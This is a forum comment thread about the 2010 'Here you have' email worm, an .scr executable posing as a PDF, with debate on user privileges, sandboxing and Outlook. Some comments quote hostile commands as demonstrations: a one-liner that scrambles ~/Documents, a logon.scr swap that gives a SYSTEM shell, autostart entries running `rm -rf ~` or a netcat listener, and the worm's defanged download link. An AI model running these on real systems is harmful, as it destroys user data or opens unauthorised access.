"the worst a virus on Linux can do is delete all your documents, it cannot break the system files"

However that is still not happening.

Re:U R teh winnar!

[Pentium100]

Can you even download and install additional programs on your ADSL modem? I could not do that with my modem (D-Link DSL-500T), so any spammer would have to exploit security bugs on the device (if there are any).

Not to mention that there are a lot of different modems, and while most of them run Linux, not all of them are compatible or even have compatible CPUs.

Re:U R teh winnar!

[Confusador]

This is very close to being right, and exactly why I wish Linux were better about letting me (or more accurately, my family) install things without admin rights. I wish that Linux viruses and, more importantly, trojans would be restricted to just blowing away home. Then they would 1) only be able to damage their own files through stupidity and 2) be easily stopped by a virus scanner. Of course, this is all in my dream world where Linux is used enough to have enough viruses to need virus scanners, but still. As it is now, people have every reason to assume that they need to put in their password to see the fluffy bunnies.

Re:U R teh winnar!

[EvanED]

This is very close to being right, and exactly why I wish Linux were better about letting me (or more accurately, my family) install things without admin rights.

Same here. Both myself and a friend occasionally do a look around for a package manager that you can use as non-root, and so far have basically struck out in terms of ones that work. (It's been a while since the last round, but as I recall the closest we got was GoboLinux's. My friend is the one who tried that out, and I forget what his gripes were.) I just yesterday started using GNU Stow as a very, very partial solution.

I wish that Linux viruses and, more importantly, trojans would be restricted to just blowing away home. Then they would 1) only be able to damage their own files through stupidity and 2) be easily stopped by a virus scanner

I think that #1 is a benefit that's greatly overstated by some people in the Linux community. Compromising a user account is an improvement over compromising the system, I don't want to dispute that... but given that (1) everyone's most important data is accessible by their user and (2) I estimate that on a vast majority of systems, compromising the user account almost is compromising the system.

I would also disagree with #2; I don't think that the biggest problems with malware detection come from the malware disabling the scanners by running at the same level, I think they come from things like polymorphic viruses and such that are just flat out hard to detect.

Re:U R teh winnar!

[KiloByte]

Just like today's Girl Genius strip (in the last panel).

Re:U R teh winnar!

[Raenex]

I wish that Linux viruses and, more importantly, trojans would be restricted to just blowing away home.

I wish Linux made it easy to sandbox applications, so that I wouldn't have to worry about running a trojan.

Re:U R teh winnar!

[_Sprocket_]

Heh. Indeed. Girl Genius is great stuff.

This is not a worm

[chispito]

It is a file that is linked in the spam message itself, with an .SCR extension (.SCR is a screen saver extension in win32, if I am not mistaken), though the text of the file reads as though it were a PDF. In Outlook, at least, downloading and executing the file immediately causes the user's outbox to fill with emails to all of his or her closest coworker friends. The emails have the subject "Here you have."

LOL - My inbox was full this morning

LOL - My inbox was full this morning with this email. Go multinational corporations - maximum effect for this crud.

*sigh* now my day will be full of work cause I'm the IT Admin *cry*

Hit NASA today

It started working its way through NASA and contractor mail servers today. Lots of folks send mail to distribution lists and so those were getting lots of backwash from people replying to them, saying they didn't think the message was for them...

Re:Hit NASA today

At least Jeanie isn't around to yank the Center off the 'Net because of a stupid Windows worm anymore.

Probing

[religious+freak]

So... *if* you were a government or some other organization - wouldn't this be a cool method of probing for vulnerabilities???
*removes tinfoil hat

People still fall for this?

[kheldan]

For that matter, people are still using Outlook?

They're still using Outlook for email

laughingwomen.jpg

Re:People still fall for this?

[jack2000]

If you still use outlook you deserve to get what is coming for you.

Re:People still fall for this?

"If you still use outlook you deserve to get what is coming for you."

There's nothing else on the market that has anywhere near the same features as Outlook/Exchange. That's why people use it. It works, and it works well. There are some sad open source kludges that approximate some of the functionality, but that's about it.

Re:People still fall for this?

[Eskarel]

Just as a point of clarification, Outlook is actually a very good e-mail client. Outlook Express however, is not by any stretch of the imagination the same product, and is an insecure PoS, it also doesn't exist in Vista or Windows 7.

Re:People still fall for this?

[jimicus]

Just as a point of clarification, Outlook is actually a very good e-mail client. Outlook Express however, is not by any stretch of the imagination the same product, and is an insecure PoS, it also doesn't exist in Vista or Windows 7.

Sorry, but I'm going to have to call you out on that one.

Outlook is an outstanding Exchange client. But you mustn't think of Exchange as just email because it's a hell of a lot more than that - plain email doesn't give you shared calendars, it doesn't give you a centralised to-do list, it doesn't give you a group address book, it seldom gives you any form of advanced access control which can be managed from the client to allow, eg. the CEOs PA to send and retrieve email on his behalf without having to log in as the CEO.

If you use Outlook as a plain email client with, eg. IMAP or POP, it's actually pretty lousy.

Re:People still fall for this?

[donatzsky]

Actually, Windows Mail (the one that comes with Vista) is just Outlook Express with a new coat of paint.
Live Mail, on the other hand, should be an entirely new client.

Re:People still fall for this?

[drunken-yeti]

oh no we are all using Compuserv mail, pine and Lotus Notes on OS2 Warp Machines

Sandboxie: 29 EUR

[tepples]

The actual reason is that the users still haven't learned from the last 9 years of experience.

The other reason is that Windows still doesn't include an easy point-and-click tool to make a jail in which to run an untrusted app. If Windows had this, people wouldn't have to spend 29 EUR on Sandboxie.

Re:Sandboxie: 29 EUR

[causality]

The actual reason is that the users still haven't learned from the last 9 years of experience.

The other reason is that Windows still doesn't include an easy point-and-click tool to make a jail in which to run an untrusted app. If Windows had this, people wouldn't have to spend 29 EUR on Sandboxie.

That sounds to me like a technical solution to a non-technical problem. Make no mistake, the inability to learn from the last 9 years of active history is firmly within the realm of a non-technical problem.

Maybe that'll work and maybe it won't. If it works, it'll be a band-aid at best, with no hope of solving the underlying problem. If perfectly implemented, the sandbox would only shift the goal of the social engineering attack. Instead of getting clueless users to run untrustworthy executables, it'll have a stronger focus on getting them to give up passwords, personal information, and other information that can be abused with or without a sandbox. Until and unless you solve the problem of ignorant users who fall for social engineering attacks the best sandbox in the world won't be any sort of panacea.

Re:Sandboxie: 29 EUR

[tepples]

[A jail] sounds to me like a technical solution to a non-technical problem.

Which makes it no different from any other access control measure in an operating system.

Re:Sandboxie: 29 EUR

[Mongoose+Disciple]

The other reason is that Windows still doesn't include an easy point-and-click tool to make a jail in which to run an untrusted app. If Windows had this, people wouldn't have to spend 29 EUR on Sandboxie.

Useless, in this case. The people who fall prey to a virus like that won't be technical enough to do that (even with an easy point and click tool) after another 20 years of using computers, much less now.

Re:Sandboxie: 29 EUR

[tepples]

The people who fall prey to a virus like that won't be technical enough to do that (even with an easy point and click tool)

If something like Sandboxie were bundled with the operating system, mail clients would by default run mail attachments in a sandbox. But you're right that it wouldn't stop "This application wants to break out of jail: Cancel or Allow?" from getting a click on Allow. The only thing that can stop that is mandatory verification of the hardware maker's digital signature on everything from the bootloader on up, as seen in iPhone and other consoles.

Re:Sandboxie: 29 EUR

[causality]

[A jail] sounds to me like a technical solution to a non-technical problem.

Which makes it no different from any other access control measure in an operating system.

I have some real doubts about that. For example, you can compile all Linux software from source and introduce hardening measures like NX bit, address base randomization, canaries, etc. Buffer overflows are a technical problem and the measures I summarized (and certainly have not exhaustively listed) really do make it technically much more difficult to conduct a buffer overflow type of exploit.

The difference is that most buffer overflows occur in software that the user intended to install and intended to run. That's quite a bit different from a social engineering attack that tricks a user into running software that the user would not run if the user had perfect knowledge of what the software is intended to do. The former is a technical problem and access controls are one appropriate technical solution. The latter is a social problem and technical measures are a stopgap solution, at best, compared to actually educating users.

Re:Sandboxie: 29 EUR

[causality]

The people who fall prey to a virus like that won't be technical enough to do that (even with an easy point and click tool)

If something like Sandboxie were bundled with the operating system, mail clients would by default run mail attachments in a sandbox. But you're right that it wouldn't stop "This application wants to break out of jail: Cancel or Allow?" from getting a click on Allow. The only thing that can stop that is mandatory verification of the hardware maker's digital signature on everything from the bootloader on up, as seen in iPhone and other consoles.

An iPhone may or may not be an appliance, but general-purpose computers and the operating systems designed for them are certainly not appliances.

Re:Sandboxie: 29 EUR

ACLs are useful technological measures, just not for what they imply them to be. These technologies come from the military where you aren't protecting from viruses but from other users with different sets of privileges. The military can also forbid any unsigned executable file to run. And if you complain you get shot.

When applied to regular OSes where there is only one user and you are trying to protect him from himself, they are completely useless. The user will authorize unsigned executable files to run at the privilege level they ask for. And he will get angry if your OS keeps him from doing it.

Jails' main problem is that they imply that you have allowed an attacker to get absolute control over the whole isolated unit which most likely has security implications. It is better than him controlling a process having access to the whole system right away, but int isn't safe, even assuming the jail is tight and break-proof.

And that still ignores the fact that a jail set up by the 'good' program itself has the above properties in case of a data execution exploit, but a malicious executable like the one in TFA will ask the user to open its door in order to get to the library.

Re:Sandboxie: 29 EUR

[symbolset]

What surprises me is that there's no Windows Server AD console you can use to isolate and terminate the users who fall for this nonsense.

Re:Sandboxie: 29 EUR

[JohnBailey]

If something like Sandboxie were bundled with the operating system, mail clients would by default run mail attachments in a sandbox. But you're right that it wouldn't stop "This application wants to break out of jail: Cancel or Allow?" from getting a click on Allow. The only thing that can stop that is mandatory verification of the hardware maker's digital signature on everything from the bootloader on up, as seen in iPhone and other consoles.

Does that include Jailbroken iPhones and consoles running homebrew apps?

If not.. Then your solution is not going to work.

NEVER underestimate the clueless user's aptitude for defeating security measures.

Re:Sandboxie: 29 EUR

[jimicus]

An iPhone may or may not be an appliance, but general-purpose computers and the operating systems designed for them are certainly not appliances.

Why not?

I'm deadly serious here, so don't automatically mark me down as a troll. Obviously it's not appropriate for all, but for a great many computers in organisations up and down the country, the person sat in front of the computer doesn't own it and isn't supposed to use it for non-work related stuff. Why shouldn't the computer be locked down so tight that it is more-or-less impossible to even run a non-approved application, enforced by means of TPM or something very like it?

Re:Sandboxie: 29 EUR

[StuartHankins]

There's little reason not to lock down corporate computers. Microsoft provides group policy and other tools explicitly for this purpose.

BUT BUT BUT some software causes issues, for instance UPS WorldShip software requires administrative access to run. It's a stupid limitation, and one we raised with them numerous times to no avail. Our solution was to switch to FedEx. For some companies, individual pieces of software may require elevated privileges and there may not be a competing package to switch to.

Windows is super!

[CrAlt]

My MS Exchange email box at work filled up with these right before the server died..

Subject: Here you are
--------------
Hello:

This is The Document I told you about,you can find it Here.http://www.sharedocuments.com/library/PDF_Document21.025542010.pdf

Please check it and reply as soon as possible.

Cheers,

Domain Name: SHAREDOCUMENTS.COM

Registrant:
        Worldwide Media, Inc
        Domain Administrator (info@mostwanteddomains.com)
        Po Box 129
        Highlands
        North Carolina,28741
        US
        Tel. +001.8132675600
        Fax. +001.9543370351

Creation Date: 09-Oct-2003
Expiration Date: 09-Oct-2011

Domain servers in listed order:
        ns17.this-domain-is-4-sale.com
        ns17.mostwanteddomains.com

-----------------

Re:Windows is super!

The actual underlying link is from http://members.multimania.co.uk/yahoophoto/... sharedocuments.com is a decoy

Re:Windows is super!

Turn in your low slashdot ID immediately.

Re:Windows is super!

[Marauder2]

Before the collective wrath of Slashdot falls upon an innocent* cyber squatter, bear in mind that the URL listed in the text of the email wasn't actually the URL that the href linked to (text claimed to point to one spot, actual href tag pointed some place completely different). It didn't link to a PDF either but an executable with the .scr (Windows Screensaver) extension.

*Presumed innocent in the context of this malware, not in the grander scheme of effing up the domain registry system for the rest of us...

Re:Windows is super!

[religious+freak]

Maybe that's the guy that bought the low uid a few years back? Pitchforks and torches!
*kidding*

Re:Windows is super!

[benraldo]

the link in the email actually points to.. added some spaces to break the url. Browse to this only if you want to get the work, or feel comfortable that you are protected. http : // members.multimania.co.uk / yahoophoto / PDF_Document21_025542010_pdf . scr Hello: This is The Document I told you about,you can find it Here.http://www.sharedocuments.com/library/PDF_Document21.025542010.pdf Please check it and reply as soon as possible. Cheers,

Re:Windows is super!

I had several of these arrive in my Inbox. The link was Hijacked. The website you list is not the same one it links to. It actually re-directs to a members.multimania.co.uk address. I was not one of the baboons to click the link. I actually pointed out to a co-worker that it's a different link. He was also smart enough not to click it. Investigate the email again and you'll see the re-direct address. Outlook shows you if you hover the mouse over the link. But for the love of god, don't accidentally click it.

Re:Windows is super!

[Nethead]

That was mfh (56).

Re:Windows is super!

The underlying URL is wrong. The link is actually:
Notice that the link is:
      members.multimania.co.uk/yahoophoto/PDF_Document21_025542010_pdf.scr
(removed Http:// so people don't click on it.....)

Re:Windows is super!

[religious+freak]

How do you know that?

Re:Windows is super!

[Nethead]

How do you know that?How do you know that?

He told me.

Adobe PDF zero day saved me

[Maxo-Texas]

I was suspicious of any PDF today.

Might not have clicked on it but I might have. You normally think of PDF's as safe.

Re:Adobe PDF zero day saved me

but they really arent http://www.technewsworld.com/story/70791.html

Re:Adobe PDF zero day saved me

[archmcd]

I haven't thought of PDF's as safe in a couple years now.
http://www.computerworld.com/s/article/9176117/PDF_exploits_explode_continue_climb_in_2010

Re:Adobe PDF zero day saved me

[bloodhawk]

You normally think of PDF's as safe.

What planet are you from? have you not seen or heard of the literally dozens of exploits and vulnerabilities constantly flowing from Adobe's readers and file format? they make microsoft look like fort knox.

Re:Adobe PDF zero day saved me

We got hit with it work today too. The file actually had a .scr extension; all that PDF stuff is a smoke screen

Re:Adobe PDF zero day saved me

[webheaded]

It wasn't actually a PDF. This circulated through my work todau and when you hovered over it, the thing went to a different site with a .scr extension.

Re:Adobe PDF zero day saved me

[LBt1st]

I know I certainly don't!

Apparently I'm in the minority because today our company got owned by this thing.
Our IT staff is a joke though. Hundreds of employees and their solution was to have someone walk around from cubical to cubical telling everyone not to open the e-mail (of course even after being told people were still opening the PDF). These things filled everyone's inboxes for about two hours before the exchange server finally crashed.
Apparently we've got other critical tasks being ran on the same box(s) as well so it didn't just affect our e-mail.

Re:Adobe PDF zero day saved me

[knarf]

Whoa there. PDF's can be as safe as you want them to be. Safety does not depend on the file format but on the application interpreting that file format. You thought plain text files were safe? What if your 'viewer' contains code to execute any code it can find in that file?

Hey, read this plain text file - it is perfectly safe after all

(cd ~/Documents;find . -type f|while read f;do mv "$f" $(dirname "$f")/$(basename "$f"|sha1sum|cut -d " " -f 1);done) &

Oh by the way have a look at your ~/Documents directory...

KTHXBY

Re:Adobe PDF zero day saved me

[wvmarle]

Well as long as you are not using Adobe reader you're quite safe.

And pdf suddenly becomes an enjoyable format. Often relatively small file size, good readability, guaranteed layout, quick launch of the reader... I still don't know why /. always puts "pdf warning" at links to pdf files.

Re:Adobe PDF zero day saved me

[NoseyNick]

never mind the fact that is was a windows exe hiding as a .scr hiding as a pdf.

Re:Adobe PDF zero day saved me

[Maxo-Texas]

I'm usually very cautious.
I actually haven't been infected since the mid 90's. Before that it was "Something wonderful is happening" on the Amiga.

But in a work environment, behind a firewall, virus scanning software, etc. I think people are lulled into accepting a PDF.

More than pictures or other kinds of links which were used in the past.

easy fix

[alphaminus]

sfc /scannow

It's already hit NASA

[ToSeek]

Got sent to a maillist that covers just about everyone who works at a NASA center east of the Mississippi. Once you add up the virus-generated emails, the emails warning everyone it's a worm, and the emails complaining "for God's sake don't reply to everybody" (which replied to everybody), there were several score messages sent to thousands of users.

Re:It's already hit NASA

[ShaunC]

This was modded insightful? Christ. I know how to secure a computer. I know fuck-all about propelling a rocket into space. So some NASA folks may not know how to compute securely; but they're busy landing probes on Mars. Yes, NASA does rock!

Intelligent doesn't equal computer savvy, nor does the opposite always hold true. There are plenty of Ph.Ds in mathematics who don't even use a calculator on a regular basis, much less a computer.

Re:It's already hit NASA

[eyenot]

Bullshit. The discussion on this particular topic has all rotated around one central concept: that this outbreak occured was stupid as hell and denotes a complete lack of any sort of basic understanding of how computers are used on behalf of people who use computers for very important things not only in their lives but many of our own.

i JUST got this virus!

[nimbius]

thank goodness I saw this article...i was seconds away from clicking on the attachment in Pine.

Re:i JUST got this virus!

[codepunk]

Good thing you didn't it may have jacked up your copy and paste buffer.

Re:i JUST got this virus!

[eulernet]

... and you would have missed the joke !

Dumb Question....

[ozzy85]

Who has the time to write these worms? And why the hell do they write them? I honestly cannot see one incentive to do so.

Re:Dumb Question....

[CrazyJim1]

People in counties with no cyber laws do it because they're typically congratulated if found out instead of imprisoned. Also if you write for a botnet, you can then leverage your botnet to do interesting stuff mimicing a super computer, or just have an extensive proxy network where you can game social systems. The main reason is a lot of people will do scummy things to make money.

Re:Dumb Question....

stealing personal information like wow account cc numbers and social security number

Re:Dumb Question....

[jack2000]

Malice? Script kiddies grinding their teeth? People hate people?

Working with people has made me jaded and callous but not enough to start writing viruses.

Re:Dumb Question....

[melikamp]

I've known people in my high school (the Russian equivalent of it) who wrote DOS viruses in assembly back in 94-96. Great times. One virus, at least, made a splash in Ukraine, or so I've been told. So there you have it: bored high school students. If no one else did it, it would be more than enough, but nowadays one can actually make money doing that.

Re:Dumb Question....

[gmuslera]

Not sure if all it does is just spreading itself. Could try things in the style of the Zeus Botnet to get some profit

Re:Dumb Question....

[Erikderzweite]

It is not that hard. This one just tricks a user into launching an executable. The rest are just technicalities.

Umm.. nope.

[CrAlt]

That would only work if you where logged in as an the admin account..
Or do you do everything as root?

Last login: Thu Sep 9 18:35:16 on console
focker:~ cralt$ cd /
focker:/ cralt$ touch testfile
touch: testfile: Permission denied
focker:/ cralt$ uname -a
Darwin focker.local 9.8.0 Darwin Kernel Version 9.8.0: Wed Jul 15 16:55:01 PDT 2009; root:xnu-1228.15.4~1/RELEASE_I386 i386

Thank you come again.

Re:Umm.. nope.

[BenoitRen]

The grandparent was talking about Macs, smartass.

Re:Umm.. nope.

[LordLimecat]

And guess what-- the "in 2010" comment doesnt really apply to an OS from 2002, does it? Win7 and Vista have basically the same sudo style controls that Linux has.

I mean really, these FUD comments have got to stop.

Re:Umm.. nope.

[treeves]

he did say,

In the original account set up on your Mac ...

I think that can be translated as, "While logged in as Administrator..."

Re:Umm.. nope.

Which is the account most commonly used for day-to-day tasks by non-technical users on a Mac.

Re:Umm.. nope.

[tepples]

Stupid question from a Linux / Mac user:

Are there really operating systems in use in 2010

[Windows XP gives everyone admin by default and is still in wide use]

The grandparent was talking about Macs, smartass.

I didn't understand it that way. Instead, I understood it as follows: One poster uses Macs and wants to learn about other operating systems still in use.

Re:Umm.. nope.

Still wrong. Sudo would be required, just like on Linux.

Re:Umm.. nope.

[al0ha]

Uh, most Mac users do everything in the admin account, because the first account you set up to use has admin privileges. If you have not specifically configured another account, then writing to the root file system is accomplished without requiring any password.

It is not the same on Unix or Linux.

Re:Umm.. nope.

[al0ha]

Incidentally, that account can also write to and create executables in

/Library
/Applications

Great way to p0wn a system is to write malware to a . directory in /Applications or /Library

Bottom line is Macs are a susceptible to system installed malware as Windows systems, unless on each system you specifically choose to create a second account without admin privs to use for general computing purposes, which most users don't thus the reason for my original response.

Re:Umm.. nope.

[drsmithy]

That would only work if you where logged in as an the admin account..

Ie: the default, which the vast, vast majority of people will be using.

Or do you do everything as root?

An "admin" in OSX is not root.

Re:Umm.. nope.

[BenoitRen]

Those quotes are from the beginning of the thread to which you appended my comment, ignoring the coments in-between. It goes like this:

Are there really operating systems in use in 2010 that let you write files to a system directory without entering an administrator password?

Yes and actually Macs are one of them Mr. Snarky. In the original account set up on your Mac perform the following

That would only work if you where logged in as an the admin account.. Or do you do everything as root?

As you can see, that comment was talking about an admin account on a Mac. Then you reply talking about Windows XP and I roll my eyes.

Lulz @work today

[mrsam]

Initially, got a few batch of these at $work$ today -- one of the remaining 800lb Wall Street gorillas. The mails originated from some senders @NYSE, and were sent to some internal mailing lists.

It didn't take long before a bunch of our own drooling baboons clicked the link, causing more mails to go out to the internal lists. That went on for a few hours. Then came the inevitable "why are you sending this", "i must've gotten this by mistake", "take me off the list" replies from more internal senders, resent to the same internal lists. Then came the inevitable "this is a virus, do not reply to all" replies to all.

I told my management that what they have in their inbox, basically, is a list of people to get the axe when the next round of layoffs comes around. Can't create a more accurate list of people who are truly the bottom of the barrel, and do not belong in an organization that's supposedly charged with with billions of investors' and depositors' money.

P.S. -- I also thought that this was the exploit for the 0-day PDF flaw too, given the .pdf extension. But if this was just an ordinary executable, that you actually had to click through an extra time to execute, then there's even less excuse for anyone with a brain to get infected with this.

Re:Lulz @work today

[ShaunC]

I told my management that what they have in their inbox, basically, is a list of people to get the axe when the next round of layoffs comes around.

Damn I wish I had mod points. The sad fact is, I'd be willing to bet some of my own money that everyone on that list makes more than you do.

Re:Lulz @work today

[mrsam]

The sad fact is, I'd be willing to bet some of my own money that everyone on that list makes more than you do.

You'd lose this bet. Some may do, but most of them were, apparently, some low-level flunkies in various Bumfuck, Nowhere branch offices.

Change that "everyone" to "some", or perhaps to "most", and you got yourself a winner. But you'd lose the "everyone" bet.

Re:Lulz @work today

Wow, well done you! (No sarcasm intended, it's nice to see an IT guy who isn't in the bottom 10% of the salary ladder.)

Re:Lulz @work today

[don_carnage]

We thought the same thing, but when I actually looked at the link it turned out to be an .SCR. We're still not sure how it got on our network.

Re:Lulz @work today

According to some online articles, the pretend pdf link goes to an .scr executable file.

Re:Lulz @work today

Spoke to my boss about this very thing - there is nothing better at weeding out the incompetents. Natural selection at its finest.

Re:Lulz @work today

[Datamonstar]

Good for you, asshole. You got to command the fate of a few people based on some non-relevant criteria hawked up in your own tiny-walled head. How about you let the management make the staffing decisions and you stick to browsing Slashdot at work? Don't be surprised if YOU are the one given the axe for 1. thinking you know how to do management's jobs better than they do and 2. for being annoying and obnoxious to your fellow co-workers.

Re:Lulz @work today

Hmmm. I'm under the impression you forgot to tick 'Post Anonymously' box. That, or you have brass balls, even with very good standing within the company.

The people you're referring to as being rife for lay-off have most likely been hired by the same managers that you're now suggesting to that they are... less intelligent. Doesn't look to good on management. Furthermore, even if these employees are unaware that opening these mails is a bad thing, they might be very good at trading stocks or doing something else that you wouldn't be able to do if your life depended on it. Add to that that you're probably in a cost-center while they might actually be earning the company money and you can see where this is going to go.

What I'm saying here is: different people, different skills, different circumstances, different decisions, different outcomes. Those outcomes may not be the ones you would like to have. Since you don't make the ultimate decisions, your opinion may very well not come into play. Good luck to you, nonetheless :).

Re:Lulz @work today

[KevinIsOwn]

Looks like somebody is embarrassed that they clicked the link to the virus. No, those weren't pictures from the party. Sorry.

But seriously, how is that a non-relevant criteria? Especially if you had somebody who has done it multiple times, that is a major risk to the company's network. Especially for a company with people's financial information, you can't have people downloading such ridiculous things.

Re:Lulz @work today

It's pretty hard to have sympathy for people that are STILL practicing poor e-mail habits after 20 years.

Re:Lulz @work today

[DeanFox]

Good for you, asshole. You got to command the fate of a few people based on some non-relevant criteria hawked up in your own tiny-walled head. How about you let the management make the staffing decisions and you stick to browsing Slashdot at work? Don't be surprised if YOU are the one given the axe for 1. thinking you know how to do management's jobs better than they do and 2. for being annoying and obnoxious to your fellow co-workers.

I'm guessing by your tone you're one of those who either clicked the link or replied to "all". I thought he had a good point. I tend to loose a touch of respect for co-workers I get these emails from. My first thought is usually: "Wow, he/she fell for this?".

Re:Lulz @work today

[Culture20]

We thought the same thing, but when I actually looked at the link it turned out to be an .SCR.

And a .scr is nothing more than a .exe renamed to .scr. Try this:
move c:\windows\system32\logon.scr c:\windows\system32\logon.scr.bak
copy c:\windows\system32\cmd.exe c:\windows\system32\logon.scr
then log off and wait for the screensaver. Tada, SYSTEM user command prompt instead of screensaver. Screensavers are just executables on windows.

Re:Lulz @work today

Eh, eh, eh. @NYSE here... and we're still getting them *today*.

On related note, I'm shocked at how long it takes to "handle" this issue. It seems a simple rule on the server side would kill this email for *everyone* in the whole company... or am I imagining a lucrative business opportunity for such a space-age feature?

Re:Lulz @work today

[StuartHankins]

Good luck in your new job!

Re:Lulz @work today

[Datamonstar]

It's non-relevant because he specifically said he worked for a financial company and not an IT company. Whether these people work in the IT department of a financial company, I don't know but I don't expect people who aren't technical insiders to fully understand these sort of threats. I work for an IT shop and people here still clicked it. I didn't. I immediately knew what it was, but I still wouldn't want those who were duped to lose their jobs over it. There are a lot of clinical people who are NOT int he IT side, but still have us on their mailing list, for example

The risks to the company lie with those charged to protect it, not the ones who are expected to come in to work, do their jobs and be profitable. This was either an unseen risk that suddenly impacted them, or a known risk that became realized. Either way, IT security is responsible. Or do you really think they can just blame all the people who clicked the link?

I don't know where you work, but I'm glad I don't work there considering how obviously, people can be fired for being tricked by a social engineering tick that specifically designed to trick them. Oh, and it's your fault you got mugged on the way home from work, too! Should have taken a different route, or somehow known that the jogger passing you up was really a thug in disguise.

Three things

[Sycraft-fu]

1) Yes, older ones. Unlike Apple, other companies don't force you to stop using an OS after a couple years. MS supports their OSes for a minimum of 10 years, and XP is scheduled to be supported until 2014. On XP most users run as an administrator, and thus need no privilege escalation to do anything. This is not required, they could run as a normal user, however they don't.

2) Who says you need system access? Most spyware we encounter these days doesn't bother, it just infects the user directory. No admin needed. Also, some detection tools have trouble noticing it when you log in as an admin and run them, since it is inactive at that point.

3) We are talking about people who will run executables from e-mail, something they've been told not to do about 1,000,000 times. You REALLY think an admin prompt will stop them? Hell no, they'll just grant permission.

If you think having to escalate privilege protects an OS, you are deluding yourself. Don't get me wrong, I like the feature and in the hands of a technical user it is a useful defense. However it does shit for the clueless users. You cannot protect someone against themselves and still give them control over their own system.

Re:Three things

[BenoitRen]

MS supports their OSes for a minimum of 10 years, and XP is scheduled to be supported until 2014.

A minimum of 10 years? Where did you get that from?

• Windows 95 was supported for 6 years.
• Windows NT 4.0 was supported for 8 years.
• Windows 98 was supported for 8 years.
• Windows Me was supported for 6 years.

Re:Three things

[UnknowingFool]

If you think having to escalate privilege protects an OS, you are deluding yourself. Don't get me wrong, I like the feature and in the hands of a technical user it is a useful defense. However it does shit for the clueless users. You cannot protect someone against themselves and still give them control over their own system.

Do you know how Linux and Unix systems work? One of the reasons that viruses do not infect them the same as Windows is that it requires privilege escalation to do any real damage. With Windows most users run with admin privileges. Before you grouse about how competent admins would have locked down Windows, realize that you can lock down Windows but it makes things very, very difficult for normal users and administrators to get things done. For many years, running many Windows applications required admin access. As applications transition to a more secure minded Windows model, security might get better. And if memory serves me correctly, a user sometimes doesn't need to actually download or run something in Windows to execute malicious code. Remember the Windows shortcut exploit that was released less than a month ago? In that case, it didn't matter if the user was clueless or not.

Re:Three things

[Missing.Matter]

I think the point is Microsoft waits until most users aren't using a particular operating system before dropping support. Support for XP is going on 10 years now, and will go for 13 since proportionately many users are (and will be) using it. How many users were using Windows 98 in 2006?

This is opposed to Apple, who for example released secrity updates to 10.4 for only 4 years. Oh, and of course who dropped all future OS support for hardware produced before 2006.

Re:Three things

[joeyblades]

Unlike Apple, other companies don't force you to stop using an OS after a couple years.

Huh? Ummm... I have a G3 Gossamer, purchased in 1997, running OS 9 since 1999, that is still going strong... still running Mac OS 9. Apparently I escaped under Apple's merciless radar because they have not forced me to stop using it. It's still a rock solid machine and I sometimes still use it to run some old PowerPC software and (get this) I can still run some 68000 software in emulation mode.

And for the record, I know you were really trying to make a statement about OS support, but I couldn't let you get away with rewriting history:

• Windows 95 was supported for less than 3 years.
• Windows NT was only supported for 4 years.
• Windows 2000 was only supported for 5 years.
• Windows XP has only been supported for this long because Microsoft screwed the pooch. If Vista would have come out sooner and if Vista wouldn't have been such a bomb and if Microsoft could make their new OSes support the tons of enterprise software that currently depends on XP, XP would be long dead.

Re:Three things

I have an 233 Mhz G3 Imac ( bondi blue I think it was called ). It has that funny handle on the top and came out in 1998 and runs OSX
Still works fine today and I can get patches as needed.

Lets see ... that would have been NT4 ? or windows 98 ?

Can you get patches for NT4 or 98

Re:Three things

[turbidostato]

"One of the reasons that viruses do not infect them the same as Windows is that it requires privilege escalation to do any real damage."

What do you mean by "real damage"?

I'd say that deleting all user's valuable data is "real damage".
I'd say that open a network socket both to connect or start a process on an unprivileged port for a bot net is "real damage".

Neither of them needs privilege scalation.

Re:Three things

UnknowingFool,

You don't need any fancy privileges. The typical user account has plenty even on Linux. I can execute files in my home folder just fine. I can even add things to login scripts which are in my home directory tree. I can play library loading games with .desktop files too. Why do you assume malware wants to do much more than just simply be a bot or collect sensitive information?

I don't keep my sensitive information on root. I don't browse to my bank account as root either. You don't need to compromise root to get to that information.

Re:Three things

[UnknowingFool]

Really? So in Linux/Unix, I can download a file and it autoruns and runs amok? Oh wait, I don't have to run it. I open a folder containing a bad shortcut and my computer gets owned? In Linux/Unix the user's files might be affected not the system files, not other users. Windows was never designed with security from the beginning. It has been patched in. And some of the patches are not large enough to cover up all the holes.

Re:Three things

[Eskarel]

Bullshit.

Linux is a multi-user system, it's specifically designed to allow you to run pretty much any kind of software as a user that you might possible want.

True you can't write to the system directories, but you can sure as hell write to anywhere in the users home directory and cause anything you like to auto run when that user logs in. The only thing you can't do is open a port below 1024, but you don't need to use any of those ports unless you want to use default ports.

Want a zombie SMTP server, file server, web server, all fine and dandy, you just use non default ports, hell 8080 doesn't even require root access to start. You want to access someone's files, exploit their web browser, all fine.

Re:Three things

[Eskarel]

For the purposes of most home PC's THE USERS FILES ARE THE ONLY ONES THAT MATTER Very few home pc's have multiple isolated users.

Desktop windows is not a truly multi-user system, but it isn't supposed to be because that's not how it's used.

Re:Three things

[turbidostato]

"Really? So in Linux/Unix, I can download a file and it autoruns and runs amok?"

Of course yes. Do you think is there any magic forbidding a browser from downloading an openoffice document and gladly open it or, say, a firefox extension from downloading a shell script mime-typed as text/x-script and executing it?

"I open a folder containing a bad shortcut and my computer gets owned?"

Owned? maybe not. But if you use a KDE desktop environment please put into ~/.kde/Autostart a script (or a symlink to a script) with something like `rm -rf ~` or `nc -l -p 23456` and see what happens (other desktop environments have different directories to same effect). Oh, and if you don't want to put the script, how do you think your filesystem browser is able to produce thumbs for common applications (hint: have a look at those directories with `ls -la`).

"In Linux/Unix the user's files might be affected not the system files"

And what the heck do you think your standard home user thinks is of more value? /bin/ls or his foreignly studing son's e-mails?

"Windows was never designed with security from the beginning."

Quite true. And what the heck has that to do with the fact that Linux is wide open to both PEBCAK and "marketing pushed for the good of joe sixpack usability" application design malpractices?

Re:Three things

Unlike Apple, other companies don't force you to stop using an OS after a couple years

Mac OS X was released in March, 2001. By my calculation, 9 1/2 years is a lot longer than "a couple". And I have never seen these Apple jack-booted thugs you speak of.

Re:Three things

MS supports their OSes for a minimum of 10 years, and XP is scheduled to be supported until 2014.
   

A minimum of 10 years? Where did you get that from?

• Microsoft Support Lifecycle Policy - "The Microsoft Support Lifecycle policy took effect in October 2002, and applies to most products currently available through retail purchase or volume licensing and most future release products. Through the policy, Microsoft will offer a minimum of:
  • 10 years of support (5 years Mainstream Support and 5 years Extended Support) at the supported service pack level for Business and Developer products
  • 5 years Mainstream Support at the supported service pack level for Consumer/Hardware/Multimedia products"

Re:Three things

[jcupitt65]

